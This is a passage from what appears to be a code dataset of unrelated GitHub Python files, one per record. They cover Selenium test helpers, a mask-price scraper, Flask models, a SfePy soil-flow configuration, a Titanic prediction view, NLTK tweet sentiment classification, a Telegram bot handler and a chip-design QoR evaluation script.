It returns True if the element is found or False\n if it can't be found.\n\n You can specify as many or as few attributes as you like.\"\"\"\n try:\n get_elements(tag=tag, css_class=css_class, id=id, text=text,\n text_regex=text_regex, **kwargs)\n return True\n except AssertionError:\n return False\n\n\ndef assert_element(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n Assert an element exists by any of several attributes.\n\n You can specify as many or as few attributes as you like.\"\"\"\n try:\n elems = get_elements(tag=tag, css_class=css_class, id=id, text=text,\n text_regex=text_regex, **kwargs)\n return elems\n except AssertionError:\n msg = 'Could not assert element exists'\n _raise(msg)\n\n\ndef assert_button(id_or_elem):\n \"\"\"\n Assert that the specified element is a button.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n a button\"\"\"\n elem = _get_elem(id_or_elem)\n if elem.tag_name == 'button':\n return elem\n if elem.get_attribute('type') == 'button':\n return elem\n _elem_is_type(elem, id_or_elem, 'submit')\n return elem\n\n\ndef click_button(id_or_elem, wait=True):\n \"\"\"\n Click the specified button.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n button = assert_button(id_or_elem)\n\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Clicking button %r' % _get_text(button))\n button.click()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef get_elements_by_css(selector):\n \"\"\"Find all elements that match a css selector.\"\"\"\n try:\n return browser.find_elements_by_css_selector(selector)\n except (WebDriverException, NoSuchElementException) as e:\n msg = 'Element not found: %s' % e\n _raise(msg)\n\n\ndef get_element_by_css(selector):\n \"\"\"Find an element by css selector.\"\"\"\n elements = get_elements_by_css(selector)\n if len(elements) != 1:\n msg = 'Could not identify element: %s elements found' % len(elements)\n _raise(msg)\n return elements[0]\n\n\ndef get_elements_by_xpath(selector):\n \"\"\"Find all elements that match an xpath.\"\"\"\n try:\n return browser.find_elements_by_xpath(selector)\n except (WebDriverException, NoSuchElementException) as e:\n msg = 'Element not found: %s' % e\n _raise(msg)\n\n\ndef get_element_by_xpath(selector):\n \"\"\"Find an element by xpath.\"\"\"\n elements = get_elements_by_xpath(selector)\n if len(elements) != 1:\n msg = 'Could not identify element: %s elements found' % len(elements)\n _raise(msg)\n return elements[0]\n\n\ndef _waitforbody():\n wait_for(get_element, tag='body')\n\n\ndef get_page_source():\n \"\"\"Gets the source of the current page.\"\"\"\n return browser.page_source\n\n\ndef close_window():\n \"\"\" Closes the current window \"\"\"\n logger.debug('Closing the current window')\n browser.close()\n\n\ndef switch_to_window(index_or_name=None):\n \"\"\"\n Switch focus to the specified window (by index or name).\n\n if no window is given, switch focus to the default window.\"\"\"\n if index_or_name is None:\n logger.debug('Switching to default window')\n browser.switch_to_window('')\n elif isinstance(index_or_name, int):\n index = index_or_name\n window_handles = 
browser.window_handles\n if index >= len(window_handles):\n msg = 'Index %r is greater than available windows.' % index\n _raise(msg)\n window = window_handles[index]\n try:\n logger.debug('Switching to window: %r' % window)\n browser.switch_to_window(window)\n except NoSuchWindowException:\n msg = 'Could not find window: %r' % window\n _raise(msg)\n else:\n name = index_or_name\n try:\n logger.debug('Switching to window: %r' % name)\n browser.switch_to_window(name)\n except NoSuchWindowException:\n msg = 'Could not find window: %r' % name\n _raise(msg)\n\n\ndef switch_to_frame(index_or_name=None):\n \"\"\"\n Switch focus to the specified frame (by index or name).\n\n if no frame is given, switch focus to the default content frame.\"\"\"\n if index_or_name is None:\n logger.debug('Switching to default content frame')\n browser.switch_to_default_content()\n else:\n logger.debug('Switching to frame: %r' % index_or_name)\n try:\n browser.switch_to_frame(index_or_name)\n except NoSuchFrameException:\n msg = 'Could not find frame: %r' % index_or_name\n _raise(msg)\n\n\ndef _alert_action(action, expected_text=None, text_to_write=None):\n \"\"\"\n Accept or dismiss a JavaScript alert, confirmation or prompt.\n\n Optionally, it takes the expected text of the Popup box to check it,\n and the text to write in the prompt.\"\"\"\n wait_for(browser.switch_to_alert)\n alert = browser.switch_to_alert()\n alert_text = alert.text\n if expected_text and expected_text != alert_text:\n error_message = 'Element text should be %r. It is %r.' \\\n % (expected_text, alert_text)\n _raise(error_message)\n if text_to_write:\n alert.send_keys(text_to_write)\n if action == 'accept':\n alert.accept()\n elif action == 'dismiss':\n alert.dismiss()\n else:\n _raise('%r is an unknown action for an alert' % action)\n\n\ndef accept_alert(expected_text=None, text_to_write=None):\n \"\"\"\n Accept a JavaScript alert, confirmation or prompt.\n\n Optionally, it takes the expected text of the Popup box to check it,\n and the text to write in the prompt.\n\n Note that the action that opens the alert should not wait for a page with\n a body element. This means that you should call functions like\n click_element with the argument wait=False.\"\"\"\n logger.debug('Accepting Alert')\n _alert_action('accept', expected_text, text_to_write)\n\n\ndef dismiss_alert(expected_text=None, text_to_write=None):\n \"\"\"\n Dismiss a JavaScript alert.\n\n Optionally, it takes the expected text of the Popup box to check it,\n and the text to write in the prompt.\n\n Note that the action that opens the alert should not wait for a page with\n a body element. This means that you should call functions like\n click_element with the argument wait=False.\"\"\"\n logger.debug('Dismissing Alert')\n _alert_action('dismiss', expected_text, text_to_write)\n\n\ndef assert_table_headers(id_or_elem, headers):\n \"\"\"\n Assert table `id_or_elem` has headers (
<th> tags) where the text matches\n    the sequence `headers`.\n    \"\"\"\n    logger.debug('Checking headers for %r' % (id_or_elem,))\n    elem = _get_elem(id_or_elem)\n    if not elem.tag_name == 'table':\n        _raise('Element %r is not a table.' % (id_or_elem,))\n    header_elems = elem.find_elements_by_tag_name('th')\n    header_text = [_get_text(elem) for elem in header_elems]\n    if not header_text == headers:\n        msg = ('Expected headers: %r. Actual headers: %r\\n' %\n               (headers, header_text))\n        _raise(msg)\n\n\ndef assert_table_has_rows(id_or_elem, num_rows):\n    \"\"\"\n    Assert the specified table has the specified number of rows (
\r\n the corresponding div_class_name is:\r\n div_class_name = 'price__sale'\r\n '''\r\n def get_price_div(self, url, div_class_name):\r\n req = requests.get(url)\r\n html = req.text\r\n div_bf = BeautifulSoup(html,features=\"lxml\")\r\n # class_name = 'price__sale'\r\n texts = div_bf.find_all('div', class_=div_class_name)\r\n return str(texts)\r\n \r\n def get_price_id(self, url, div_id_name):\r\n req = requests.get(url)\r\n html = req.text\r\n div_bf = BeautifulSoup(html,features=\"lxml\")\r\n texts = div_bf.find_all('div', id=div_id_name)\r\n return str(texts)\r\n '''\r\n Extract price from price contained div\r\n Parameters: div_bf - (string); class_name - (string)\r\n Return: price - (string)\r\n\r\n div_bf --> get from get_price_div function\r\n class_name can be found in ... section which contains price\r\n eg.\r\n the price contained ... section is\r\n $9.99 = $0\r\n so the class_name is:\r\n class_name = 'price-item price-item--sale'\r\n '''\r\n def get_price(self, div_bf, class_name, div_tag):\r\n price_bf = BeautifulSoup(div_bf,features=\"lxml\")\r\n price = str(price_bf.find(div_tag, {'class' : class_name}).string)\r\n return price\r\n\r\n def abstract_price(self, url):\r\n\r\n # headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36', \"Upgrade-Insecure-Requests\": \"1\",\"DNT\": \"1\",\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\"Accept-Language\": \"en-US,en;q=0.5\",\"Accept-Encoding\": \"gzip, deflate\"}\r\n # req = requests.get(url, headers=headers)\r\n \r\n # modify each if/elif to abstract price -- Siqi\r\n\r\n #Pod\r\n if url == 'https://www.podsupplies.com/products/kids-mask?variant=37609154871491':\r\n url = 'https://www.podsupplies.com/products/kids-mask?variant=37609154871491'\r\n s_div_name = 'price__sale'\r\n # o_div_name = 'price__regular'\r\n sale_span_name = 'price-item price-item--sale'\r\n # orig_span_name = 'price-item price-item--regular'\r\n s_div = self.get_price_div(url, s_div_name)\r\n sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n\r\n #Wayre\r\n elif url == 'https://www.shopwayre.com/collections/all/products/kids-high-tech-washable-mask':\r\n # There are many prices in this page, I choose only one from them -- Siqi\r\n # soup = BeautifulSoup(req.text, 'html.parser')\r\n # texts = soup.find('meta', property='product:price:amount')\r\n # sale_price = '$'+texts[\"content\"]\r\n url = 'https://www.shopwayre.com/collections/all/products/kids-high-tech-washable-mask'\r\n s_div_name = \"ProductMeta__PriceList Heading\" \r\n sale_span_name = \"ProductMeta__Price Price Price--highlight Text--subdued u-h4\"\r\n s_div = self.get_price_div(url, s_div_name)\r\n sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n\r\n\r\n # Happy Mask \r\n elif url == 'https://www.happymasks.com/collections/pro/products/black-pro':\r\n url = 'https://www.happymasks.com/collections/pro/products/black-pro'\r\n s_div_name = 'price-container'\r\n sale_span_name = 'product-single__price'\r\n s_div = self.get_price_div(url, s_div_name)\r\n sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n \r\n #Honeywell \r\n elif url == 'https://ppe.honeywell.com/collections/face-covers/products/honeywell-3d-knit-face-mask-light-grey-size-s-m-4-pk':\r\n url = 'https://ppe.honeywell.com/collections/face-covers/products/honeywell-3d-knit-face-mask-light-grey-size-s-m-4-pk'\r\n s_div_name = 'product-price--mobile'\r\n # sale_span_name 
= 'money bfx-price'\r\n            sale_span_name = 'money'\r\n            # s_div = self.get_price_div(url, s_div_name)\r\n            s_div = self.get_price_id(url, s_div_name)\r\n\r\n            price_bf = BeautifulSoup(s_div,features=\"lxml\")\r\n            price = str(price_bf.find('span', {'class' : 'onsale'}))\r\n\r\n            sale_price = self.get_price(price, sale_span_name,'span').strip()\r\n\r\n        #Caraa\r\n        elif url == 'https://caraasport.com/products/3-tailored-junior-masks?variant=39513097764944':\r\n            url = 'https://caraasport.com/products/3-tailored-junior-masks?variant=39513097764944'\r\n            s_div_name = 'price-flex'\r\n            sale_span_name = 'f4-l f3-ns f4 ttu gold tracked brandon'\r\n            s_div = self.get_price_div(url, s_div_name)\r\n            # sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n            price_bf = BeautifulSoup(s_div, features=\"lxml\")\r\n            price = str(price_bf.find('span', {'id' : \"ProductPrice\"})['content'])\r\n\r\n            price_bf = BeautifulSoup(price, features=\"lxml\")\r\n            price = str(price_bf.find('span', {'class' : 'money'}).string)\r\n            sale_price = price.strip()\r\n\r\n        #Flomask \r\n        elif url == 'https://flomask.com/collections/flo-mask-bundle-mask-12-filters/products/flo-mask-essential-bundle':\r\n            url = 'https://flomask.com/collections/flo-mask-bundle-mask-12-filters/products/flo-mask-essential-bundle'\r\n            s_div_name = \"price__regular\"\r\n            sale_span_name = \"price-item price-item--regular\"\r\n            s_div = self.get_price_div(url, s_div_name)\r\n            sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n        \r\n        # 3M\r\n        elif url == 'https://www.3m.com/3M/en_US/p/d/v000075539/':\r\n            url = 'https://www.3m.com/3M/en_US/p/d/v000075539/'\r\n            #########################################################################\r\n            # 3M is special: the price is rendered by JavaScript; we tried the following methods\r\n            # but did not succeed; probably a multi-threaded Render can help\r\n            #########################################################################\r\n            # s_div_name = \"mkpl-price\"\r\n            # sale_span_name = \"mkpl-price_value\"\r\n            # s_div = self.get_price_div(url, s_div_name)\r\n            # html = req.text\r\n            # div_bf = BeautifulSoup(html, features=\"lxml\")\r\n            # texts = div_bf.find_all('div', class_=\"MMM--selectionBox--cntnr\")\r\n            # print(texts)\r\n            # sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n\r\n            sale_price = \"$0\"\r\n            \r\n            # page = Render(url)\r\n            # html = BeautifulSoup(page.html, 'html.parser')\r\n            # price_bf = html.find('p', class_='mkpl-price_value')\r\n            # print(html)\r\n            # print(\"????\")\r\n            # print(price_bf.text)\r\n            # sale_price = re.findall(r\"(\\$[0-9]+\\.*[0-9]*)\", price_bf.text)[0]\r\n\r\n        else:\r\n            sale_price = \"$0\"\r\n        print(sale_price)\r\n        print(url)\r\n        return sale_price\r\n        \r\n        \r\n        \r\n","repo_name":"OrdinaryCrazy/Kayak_for_Masks","sub_path":"KayakMask/masklink/spider_1206.py","file_name":"spider_1206.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"28078704736","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\ndb = SQLAlchemy(app)\n\n# Models\nclass College(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(2048), unique=True)\n state_abbr = db.Column(db.String(16))\n lat = db.Column(db.Float())\n lon = db.Column(db.Float())\n student_expense = db.relationship('StudentExpense', backref='college', \n uselist=False)\n degree_salaries = db.relationship('CollegeDegreeSalary', backref='college')\n\n def __init__(self, name, state_abbr, lat, lon):\n self.name = name\n self.state_abbr = state_abbr\n self.lat = lat\n self.lon = lon\n\n def __repr__(self):\n return '\\nname: {}, state_abbr: {}, lat: {}, lon: {}\\n'.format(self.name, \n self.state_abbr, self.lat, self.lon)\n\nclass StudentExpense(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n college_id = db.Column(db.Integer, db.ForeignKey('college.id'), unique=True)\n in_state_tuition = db.Column(db.Integer)\n out_state_tuition = db.Column(db.Integer)\n book_supplies = db.Column(db.Integer)\n on_campus_room_board = db.Column(db.Integer)\n off_campus_room_board = db.Column(db.Integer)\n average_aid = db.Column(db.Integer)\n\n def __init__(self, college_id, in_state_tuition, out_state_tuition, \\\n book_supplies, on_campus_room_board, off_campus_room_board, average_aid):\n self.college_id = college_id\n self.in_state_tuition = in_state_tuition\n self.out_state_tuition = out_state_tuition\n self.book_supplies = book_supplies\n self.on_campus_room_board = on_campus_room_board\n self.off_campus_room_board = off_campus_room_board\n self.average_aid = average_aid\n\n def __repr__(self):\n return 'Too lazy to write repr for StudentExpense'\n\nclass CollegeExpense(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n college_id = db.Column(db.Integer, db.ForeignKey('college.id'), unique=True)\n instruction = db.Column(db.Integer)\n research = db.Column(db.Integer)\n public_service = db.Column(db.Integer)\n academic_support = db.Column(db.Integer)\n other = db.Column(db.Integer)\n\n def __init__(self, college_id, instruction, research, public_service, \\\n academic_support, other):\n self.college_id = college_id\n self.instruction = instruction,\n self.research = research\n self.public_service = public_service\n self.academic_support = academic_support\n self.other = other\n\n def __repr__(self):\n return 'Too lazy to write repr for CollegeExpense'\n\nclass Degree(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(1024), unique=True)\n college_salaries = db.relationship('CollegeDegreeSalary', backref='degree')\n\n def __init__(self, name):\n self.name = name\n\n def __repr__(self):\n return '\\nname: {}\\n'.format(self.name)\n\nclass CollegeDegreeSalary(db.Model):\n __table_args__ = (db.UniqueConstraint('degree_id', 'college_id', name='college_payoff'),)\n\n id = db.Column(db.Integer, primary_key=True)\n degree_id = db.Column(db.Integer, db.ForeignKey('degree.id'))\n college_id = db.Column(db.Integer, db.ForeignKey('college.id'))\n salary = db.Column(db.Integer)\n\n def __init__(self, degree_id, college_id, salary):\n self.degree_id = degree_id\n self.college_id = college_id\n self.salary = salary\n\n def __repr__(self):\n return '\\ndegree_id: {}, college_id: {}, salary: {}\\n'.format(self.degree_id, \n self.college_id, 
self.salary)\n","repo_name":"bigolu/ru-coursework","sub_path":"databases/final-project/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"39799379052","text":"r\"\"\"\nvariational formulation described at https://www.authorea.com/users/23640/articles/61529\nInspired from http://sfepy.org/doc-devel/examples/diffusion/poisson_field_dependent_material.html\nHelp thread: https://groups.google.com/forum/#!msg/sfepy-devel/dbEy3I3jSOg/mxQJEkpOCAAJ\n\ncd ~bin/sfepy\n./simple.py SEP_pdf/EnvGeotech/Richards-Buckingham_SfePy.py --save-regions-as-groups\n./postproc.py cube_big_tetra_regions.vtk # works with mayavi <= 4.2\n\"\"\"\n\nfrom sfepy import data_dir\nfrom sfepy.base.base import output\nimport numpy as np\n\nfilename_mesh = data_dir + '/meshes/3d/cube_big_tetra.mesh'\n\n# Constitutive relationships expressed in terms of psi, where psi is suction (psi = -h)\ndef vanGenuchten(ksat, aVG, nVG, mVG, lVG, psi):\n k = np.piecewise(psi, [psi < 0, psi >= 0],\n [ksat, ksat*((1-((aVG*psi[psi >= 0])**(nVG*mVG))*((1+((aVG*psi[psi >= 0])**nVG))**(-mVG)))**2) / ((1+((aVG*psi[psi >= 0])**nVG))**(mVG*lVG))])\n return(k)\n\ndef brooksCorey(aev, lBC, ksat, psi):\n k = np.piecewise(psi, [psi < aev, psi >= aev],\n [ksat, ksat * (psi[psi >= aev] / aev) ** (-2 - 3 * lBC)])\n return(k)\n\n# Material parameters\n## the initial residual is almost zero - this might mean that you need some\n## scaling of parameters, so that the entries in the rhs (and the matrix) are not\n## too small. - Robert Cimrman, https://groups.google.com/forum/#!topic/sfepy-devel/dbEy3I3jSOg\nscaling = 1\n\n## typical uniform silt\nsilt_thR = 0.034\nsilt_thS = 0.460\nsilt_ksat = 7E-7 * scaling\n\n### van Genuchten parameters\nsilt_aVG = 1.6 / scaling\nsilt_nVG = 1.37\nsilt_mVG = 1 - (1 / silt_nVG)\nsilt_lVG = 0.5\n\n### Brooks and Corey parameters\nsilt_aev = 0.35 * scaling\nsilt_lBC = 0.35\n\ndef get_conductivity(ts, coors, problem, equations = None, mode = None, **kwargs):\n \"\"\"\n Calculates the conductivity with a constitutive k(psi) relation,\n where psi = -h.\n \"\"\"\n if mode == 'qp':\n\n ## Get pressure values\n h_values = problem.evaluate('ev_volume_integrate.i.Omega(h)',\n mode = 'qp', verbose = False) * scaling\n psi_values = -h_values\n\n # van Genuchten\n val = vanGenuchten(ksat = silt_ksat, aVG = silt_aVG, nVG = silt_nVG,\n mVG = silt_mVG, lVG = silt_lVG, psi = psi_values)\n\n # Brooks and Corey\n #val = brooksCorey(ksat = silt_ksat, aev = silt_aev, lBC = silt_lBC,\n # psi = psi_values)\n\n # Reshape the val vector to match SfePy expectations\n val.shape = (val.shape[0] * val.shape[1], 1, 1)\n\n # Check output\n output('h_values: min:', h_values.min(), 'max:', h_values.max())\n output('conductivity: min:', val.min(), 'max:', val.max())\n\n return {'val' : val}\n\n\nmaterials = {\n 'coef' : 'get_conductivity',\n 'flux' : ({'val' : 3E-8 * scaling},),\n}\n\nfields = {\n 'pressure' : ('real', 1, 'Omega', 1),\n}\n\nvariables = {\n 'h' : ('unknown field', 'pressure', 0),\n 'v' : ('test field', 'pressure', 'h'),\n}\n\nregions = {\n 'Omega' : 'all',\n 'Gamma_Bottom' : ('vertices in (z < -0.49999)', 'facet'),\n 'Gamma_Top' : ('vertices in (z > 0.49999)', 'facet'),\n}\n\nebcs = {\n 'P1' : ('Gamma_Bottom', {'h.0' : 0}),\n}\n\nfunctions = {\n 'get_conductivity' : (get_conductivity,),\n}\n\nintegrals = {\n 'i' : 2, # not sure of value to use here\n}\n\nequations = {\n 'Pressure' : \"\"\"dw_laplace.i.Omega(coef.val, v, h) - dw_surface_integrate.i.Gamma_Top(flux.val, v) = 0\"\"\"\n}\n\nsolvers = {\n 'ls' : ('ls.scipy_direct', {}),\n 'newton' : ('nls.newton', {\n 'i_max' : 1,\n 'eps_a' : -1e-10,\n 'eps_r' : -1,\n }),\n 'ts' : ('ts.simple', {\n 't0' : 0.0,\n 't1' : 
1.0,\n        'dt' : None,\n        'n_step' : 5,\n        'quasistatic' : True,\n    }),\n}\n\noptions = {\n    'ts' : 'ts',\n    'nls' : 'newton',\n    'ls' : 'ls',\n}\n","repo_name":"essicolo/EnvGeotech","sub_path":"Richards-Buckingham_SfePy.py","file_name":"Richards-Buckingham_SfePy.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"434935957","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nimport pickle\nimport numpy as np\nimport pandas as pd\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, 'survived/index.html')\n\n\ndef predict(request):\n # Load the model\n with open('data/model.pkl', 'rb') as file:\n model = pickle.load(file)\n \n if model is None:\n return HttpResponse('there is no model')\n\n # Load the dataset\n df = pd.read_csv('data/train.csv')\n\n # Clean the dataset\n\n df['Sex'] = df['Sex'].map(dict(male=1.0, female=0.0))\n df.drop(columns=['PassengerId', 'Survived'], inplace=True)\n df['Age'].fillna(df['Age'].mean(), inplace=True)\n df = df.select_dtypes(exclude='object')\n\n # If method is POST\n if request.method == \"POST\":\n\n # Svaing request POST\n name = request.POST['name']\n \n # Create a new dataframe\n X = pd.DataFrame(\n dict(\n pclass = float(request.POST['pclass']),\n sex = 1.0 if request.POST['sex'] == 'male' else 0.0,\n age = float(request.POST['age']),\n sibsp = request.POST['sibsp'],\n parch = request.POST['parch'],\n fare = request.POST['fare'],\n C = 0.0,\n Q = 0.0,\n S = 1.0,\n Master = 1.0 if request.POST['title'] == 'Master' else 0.0,\n Miss = 1.0 if request.POST['title'] == 'Miss' else 0.0,\n Mr = 1.0 if request.POST['title'] == 'Mr' else 0.0,\n Mrs = 1.0 if request.POST['title'] == 'Mrs' else 0.0,\n Other = 1.0 if request.POST['title'] == 'Other' else 0.0\n ), index=[0]\n )\n \n pred = model.predict(X)\n return render(request, 'survived/predict.html', {\n \"predict\": pred[0],\n \"name\": name\n })\n\n \n \n\n\n","repo_name":"mdbruchard/titanic","sub_path":"survived/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"13117801675","text":"#!/usr/bin/env python\r\n#-*- coding:utf-8 -*-\r\n# author:Administrator\r\n# datetime:2019/1/19 19:06\r\n# software: PyCharm\r\nfrom date20190119.route_scheme.map import *\r\nclass Run():\r\n def go_run(self):\r\n self.start=input(\"请输入起点:\")\r\n self.end=input(\"请输入终点:\")\r\n self.trip_mode=input(\"请输入出行方式(公交,驾车,步行):\")\r\n self.trip_mode1=map().trip_mode(self.trip_mode)\r\n\r\n start_point=map().get_Position_Info(self.start)\r\n end_point=map().get_Position_Info(self.end)\r\n\r\n map().path(start_point[0],start_point[1],self.start,\r\n end_point[0],end_point[1],self.end,self.trip_mode1)\r\n\r\nif __name__ == '__main__':\r\n Run().go_run()","repo_name":"RedAnanas/macbendi","sub_path":"date20190119/route_scheme/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"7576283497","text":"import pandas as pd # data processing, CSV file I/O\nfrom sklearn.model_selection import train_test_split # function for splitting data to train and test sets\n\nimport nltk\nfrom nltk.corpus import stopwords\n# from wordcloud import WordCloud, STOPWORDS\n# import matplotlib.pyplot as plt\nimport time\nstart_time = time.time()\n\ndata = pd.read_csv('Tweets.csv', nrows=2000)\ndata = data[['text', 'airline_sentiment']]\ndata = data[data.airline_sentiment != \"neutral\"]\n# data = data[1:2000]\ntrain, test = train_test_split(data, test_size=0.4)\n\ntrain_pos = train[train['airline_sentiment'] == 'positive']\ntrain_pos = train_pos['text']\ntrain_neg = train[train['airline_sentiment'] == 'negative']\ntrain_neg = train_neg['text']\n\n\n# def wordcloud_draw(data, color='black'):\n# words = ' '.join(data)\n# cleaned_word = \" \".join([word for word in words.split()\n# if 'http' not in word\n# and not word.startswith('@')\n# and not word.startswith('#')\n# and word != 'RT'\n# ])\n# wordcloud = WordCloud(stopwords=STOPWORDS,\n# background_color=color,\n# width=2500,\n# height=2000\n# ).generate(cleaned_word)\n# plt.figure(1, figsize=(13, 13))\n# plt.imshow(wordcloud)\n# plt.axis('off')\n# plt.show()\n\n\n#print(\"Positive words\")\n#wordcloud_draw(train_pos, 'white')\n#print(\"Negative words\")\n#wordcloud_draw(train_neg)\n\ntweets = []\nstopwords_set = set(stopwords.words(\"english\"))\n\nfor index, row in train.iterrows():\n words_filtered = [e.lower() for e in row.text.split() if len(e) >= 3]\n words_cleaned = [word for word in words_filtered\n if 'http' not in word\n and not word.startswith('@')\n and not word.startswith('#')\n and word != 'RT']\n words_without_stopwords = [word for word in words_cleaned if not word in stopwords_set]\n tweets.append((words_without_stopwords, row.airline_sentiment))\n\ntest_pos = test[test['airline_sentiment'] == 'positive']\ntest_pos = test_pos['text']\ntest_neg = test[test['airline_sentiment'] == 'negative']\ntest_neg = test_neg['text']\n\n\ndef get_words_in_tweets(tweets):\n all = []\n for (words, sentiment) in tweets:\n all.extend(words)\n return all\n\n\ndef get_word_features(wordlist):\n wordlist = nltk.FreqDist(wordlist)\n features = wordlist.keys()\n return features\n\n\nw_features = get_word_features(get_words_in_tweets(tweets))\n\n\ndef extract_features(document):\n document_words = set(document)\n features = {}\n for word in w_features:\n features['contains(%s)' % word] = (word in document_words)\n return features\n\n\n#print(\"features\")\n#wordcloud_draw(w_features)\n\n\ntraining_set = nltk.classify.apply_features(extract_features, tweets)\n\n# Training the Naive Bayes classifier\nclassifier = nltk.NaiveBayesClassifier.train(training_set)\n\nclassifier = nltk.Cl\n\n# # Training the Decision Tree classifier\n# classifier = nltk.DecisionTreeClassifier.train(training_set)\n\n\nneg_cnt = 0\npos_cnt = 0\nfor obj in test_neg:\n res = classifier.classify(extract_features(obj.split()))\n if res == 'negative':\n neg_cnt = neg_cnt + 1\nfor obj in test_pos:\n res = classifier.classify(extract_features(obj.split()))\n if res == 'positive':\n pos_cnt = pos_cnt + 1\n\nprint('[negative]: %s/%s ' % (neg_cnt, len(test_neg)))\nprint(neg_cnt/len(test_neg))\nprint('[positive]: %s/%s ' % (pos_cnt, len(test_pos)))\nprint(pos_cnt/len(test_pos))\n\naccuracy = (neg_cnt + pos_cnt) / (len(test_neg) + len(test_pos))\nprint('[accuracy]')\nprint(accuracy)\n\nprint(\"--- %s seconds ---\" % (time.time() - 
start_time))\n","repo_name":"RuolanZeng/Twitter-Sentiment-Analysis","sub_path":"NLTK-Naive Bayes.py","file_name":"NLTK-Naive Bayes.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"27763307795","text":"# -*- coding: utf-8 -*-\n\n@bot.message_handler(commands=['setlang' , 'Setlang'])\ndef setlang_message(message):\n cur.execute('SELECT * from language where id = %s', [str(message.from_user.id)])\n record = cur.fetchall()\n for row in record:\n userid = row[0]\n userlang = row[1]\n \n if len(message.text.split()) < 2:\n bot.reply_to(message, \"Please choose a language! En/Fa \\nلطفا زبان مورد نظر خود را وارد کنید! فارسی/انگلیسی\", parse_mode=\"Markdown\")\n return\n if True:\n langz = message.text.replace(\"/setlang \",\"\",1).replace(\"/Setlang \",\"\",1)\n if langz == \"en\":\n cur.execute('INSERT INTO `language` (`id`, `language`) VALUES (%s, %s)', [str(message.from_user.id), \"en\"])\n db.commit()\n bot.send_message(message.chat.id, \"Success!\")\n elif langz == \"fa\":\n cur.execute('INSERT INTO `language` (`id`, `language`) VALUES (%s, %s)', [str(message.from_user.id), \"fa\"])\n db.commit()\n bot.send_message(message.chat.id, \"انجام شد!\")\n else:\n bot.reply_to(message, \"Language not found \\n زبان یافت نشد\")\n","repo_name":"SaloxiddinTursunaliev/TelegramTaxiBot","sub_path":"src/plugins/setlang.py","file_name":"setlang.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"20920980659","text":"import os\nimport sys \nsys.path.append(\".\")\n\nimport time\nimport numpy as np \nimport subprocess as sp\n\n\ndef getQoR(nameVars, variables, precfg, script, baseline, clkref, basedir=\"run\"): \n configs = precfg.copy()\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = basedir + \"/time\" + str(time.time()).replace(\".\", \"\")\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n try: \n runPythonCommand(script, configs, timeout=None, outfile=outfile)\n results = parseResult(outfile, clkref)\n except Exception as e: \n print(\"[EVALUATION]: FAILED or TIMEOUT\")\n print(e)\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n os.system(\"rm -rf \" + basedir + \" > /dev/null 2> /dev/null\")\n return portion\n\n\ndef parseResult(filename, clkref=2.5): \n slack, power, area = \"ERR\", \"ERR\", \"ERR\"\n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n for line in lines: \n splited = line.strip().split()\n if len(splited) >= 3: \n try: \n slack = clkref - float(splited[0])\n power = float(splited[1])\n area = float(splited[2])\n except ValueError: \n slack = \"ERR\"\n power = \"ERR\"\n area = \"ERR\"\n return [slack, power, area]\n\n\ndef evalQoR(nameVars, variables, baseline, iter, script, clkref, precfg, visited): \n print(\"[ITERATION]:\", iter, \";\", variables)\n configs = precfg.copy()\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = \"run/iter_\" + str(iter)\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n outfile = \"tmp.txt\"\n try: \n runPythonCommand(script, configs, timeout=None, outfile=outfile)\n results = parseResult(outfile, clkref)\n except Exception: \n print(\"[EVALUATION]: 